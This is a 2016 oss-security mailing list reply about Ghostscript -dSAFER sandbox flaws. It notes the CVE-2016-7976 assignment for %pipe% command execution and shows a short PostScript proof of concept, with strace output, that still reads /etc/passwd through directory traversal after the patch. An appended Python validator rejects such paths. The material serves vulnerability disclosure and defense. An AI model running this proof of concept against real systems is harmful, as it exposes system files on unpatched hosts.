Date: Wed, 19 Oct 2016 16:29:43 +0200
From: Cedric Buissart <cbuissar@...hat.com>
To: oss-security@...ts.openwall.com
Cc: taviso@...gle.com
Subject: Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems

On Wed, Oct 5, 2016 at 8:04 PM, <cve-assign@...re.org> wrote:

> > bug: various userparams allow %pipe% in paths, allowing remote shell
> > command execution.
> > id: http://bugs.ghostscript.com/show_bug.cgi?id=697178
> > repro: http://www.openwall.com/lists/oss-security/2016/09/30/8
> > patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=71ac87493b1e445d6c07554d4246cf7d4f44875c
>
> Use CVE-2016-7976.
>
> There currently isn't a separate CVE ID for the earlier impact that
> occurred when "b" was in the mode argument to popen. The question of
> whether popen will execute anyway (even with the "b" character) is,
> more or less, a reachability concern in this context, and doesn't mean
> that a second vulnerability needs to be defined.
>
The original report for this bug (http://bugs.ghostscript.com/show_bug.cgi?id=697178),
as described by Florian, mentioned a directory traversal issue.
The directory traversal does not appear to be resolved after applying the
given patch:

$ cat putdevice-open.ps
%!PS
currentdevice null true mark /OutputICCProfile (../../../../../etc/passwd)
.putdeviceparams
quit
$ strace -f -e open gs -dSAFER putdevice-open.ps |& grep passwd
open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 6

Is it expected?

-- 
Cedric Buissart,
Product Security
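A defender-side illustration of the path check the message above implies is missing, added here as example code that is not part of the original post or of Ghostscript itself: it resolves a user-supplied parameter value against a base directory lexically and rejects values that escape it through ".." or an absolute path, or that carry a Ghostscript IODevice prefix such as %pipe%. The base directory is the one visible in the strace line above; the function names are assumptions.

```python
import posixpath

# Constructed from the strace output above: the directory Ghostscript
# prepended to the OutputICCProfile value (version-specific).
ICC_BASE = "/usr/share/ghostscript/9.20/iccprofiles"


def resolve_confined(base, candidate):
    """Return the normalized path of `candidate` joined to `base`, or None
    if the result would lie outside `base` or names an IODevice.

    This is a purely lexical check (no filesystem access), so it does not
    see through symlinks; a real implementation would additionally
    canonicalize with the filesystem (e.g. realpath) before opening.
    """
    # Ghostscript's %device%name syntax (e.g. %pipe%cmd) is not a plain
    # file path at all, so refuse it before any path arithmetic.
    if candidate.startswith("%"):
        return None
    base_norm = posixpath.normpath(base)
    # join() discards `base` when `candidate` is absolute, and normpath()
    # collapses "..", so both escape routes reduce to a prefix comparison.
    joined = posixpath.normpath(posixpath.join(base_norm, candidate))
    if joined != base_norm and not joined.startswith(base_norm + "/"):
        return None
    return joined


def is_confined(base, candidate):
    """True when `candidate` stays inside `base` under the rules above."""
    return resolve_confined(base, candidate) is not None


if __name__ == "__main__":
    for value in ("default_rgb.icc", "../../../../../etc/passwd",
                  "/etc/passwd", "%pipe%id"):
        print(value, "->", resolve_confined(ICC_BASE, value))
```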
